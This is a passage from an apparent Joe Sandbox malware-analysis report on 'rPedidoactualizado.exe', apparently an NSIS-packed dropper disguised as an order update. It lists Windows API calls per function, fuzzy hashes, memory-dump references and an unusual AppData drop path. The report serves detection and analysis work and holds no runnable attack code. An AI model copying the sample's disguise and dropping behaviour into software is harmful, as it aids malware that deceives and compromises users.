                                            • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                            • Part of subcall function 00405880: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 004058A9
                                            • Part of subcall function 00405880: CloseHandle.KERNEL32(?), ref: 004058B6
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F4D
                                            • Part of subcall function 00406722: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F01,?,?,?,?,?,?), ref: 00406733
                                            • Part of subcall function 00406722: GetExitCodeProcess.KERNEL32(?,?), ref: 00406755
                                            • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                          • String ID:
                                          • API String ID: 2972824698-0
                                          • Opcode ID: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                          • Instruction ID: 1848912924f12909307f0f16d051c5eef0c325367a6f8932b55625d14ee19b35
                                          • Opcode Fuzzy Hash: 716e4bcc1b8b9f2027449172acbc8f1de255482e8a371654dbc69d7b5ce7f032
                                          • Instruction Fuzzy Hash: 96F09032906021DBCB20FBA19D845DF76A4EF40358B2441BBF902B61D1CB7C4E519BAE
                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C93
                                          • GetDlgItem.USER32(?,00000408), ref: 00404C9E
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CE8
                                          • LoadBitmapW.USER32(0000006E), ref: 00404CFB
                                          • SetWindowLongW.USER32(?,000000FC,00405273), ref: 00404D14
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D28
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D3A
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D50
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D5C
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D6E
                                          • DeleteObject.GDI32(00000000), ref: 00404D71
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D9C
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DA8
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E3E
                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E69
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E7D
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404EAC
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EBA
                                          • ShowWindow.USER32(?,00000005), ref: 00404ECB
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FC8
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040502D
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405042
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405066
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405086
                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0040509B
                                          • GlobalFree.KERNEL32(00000000), ref: 004050AB
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405124
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051CD
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051DC
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004051FC
                                          • ShowWindow.USER32(?,00000000), ref: 0040524A
                                          • GetDlgItem.USER32(?,000003FE), ref: 00405255
                                          • ShowWindow.USER32(00000000), ref: 0040525C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 1638840714-813528018
                                          • Opcode ID: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                          • Instruction ID: 9d148378a915bf423124f05431c6d1c5c5454a8af56f3bee09cc42272145c63f
                                          • Opcode Fuzzy Hash: 7bba4bc50886af6ee4f9e8a9478083b1cbee84b53dc979653cd125d1348ee930
                                          • Instruction Fuzzy Hash: 59026EB0900209EFEB109F54DD85AAE7BB9FB85314F10817AF610BA2E1D7799E41CF58
                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                          • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                          • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                          • lstrcmpiW.KERNEL32(: Completed,007A1F20,00000000,?,?), ref: 00404866
                                          • lstrcatW.KERNEL32(?,: Completed), ref: 00404872
                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                            • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                            • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                            • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                            • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                            • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                          • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,00000001,0079FEF0,?,?,000003FB,?), ref: 00404947
                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                            • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                            • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                            • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: : Completed$A$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                          • API String ID: 2624150263-2682436269
                                          • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                          • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                          • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                          • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                          APIs
                                          • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                          Strings
                                          • C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004021C3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: CreateInstance
                                          • String ID: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen
                                          • API String ID: 542301482-2712461677
                                          • Opcode ID: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                          • Instruction ID: 8dfa29a236a07f1275cc6a79af1154fb3a8ffb17113c9066b1df84c51f017d98
                                          • Opcode Fuzzy Hash: 47d0b6cfbb01b3f03f9c85bf81605092c369e934b5dec228f075aa53eaa66100
                                          • Instruction Fuzzy Hash: 4F413A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040446B
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040449C
                                          • GetSysColor.USER32(?), ref: 004044AD
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                          • lstrlenW.KERNEL32(?), ref: 004044CE
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                          • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                          • SendMessageW.USER32(00000000), ref: 00404550
                                          • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                          • SetCursor.USER32(00000000), ref: 004045CF
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                          • SetCursor.USER32(00000000), ref: 004045EB
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040461A
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                          • String ID: : Completed$DC@$N
                                          • API String ID: 3103080414-907034273
                                          • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                          • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                          • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                          • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F
                                          • API String ID: 941294808-1304234792
                                          • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                          • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                          • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                          • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                          • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                            • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D02
                                            • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D34
                                          • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                          • wsprintfA.USER32 ref: 00405F62
                                          • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?,?,?,?,?), ref: 00405F9D
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FAC
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE4
                                          • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                          • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406052
                                            • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\rPedidoactualizado.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                            • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_rPedidoactualizado.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$[Rename]
                                          • API String ID: 2171350718-461813615
                                          • Opcode ID: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                          • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                          • Opcode Fuzzy Hash: 210d5d9a443b3001b4c7cda13cc78adcf358d44dd1d7e4f25ad0eda9c69d4b7c
                                          • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                          • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                          • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                          • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rPedidoactualizado.exe",00403347,C:\Users\user\AppData\Local\Temp\,75923420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2059192300.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2059174986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059206568.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2059221530.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
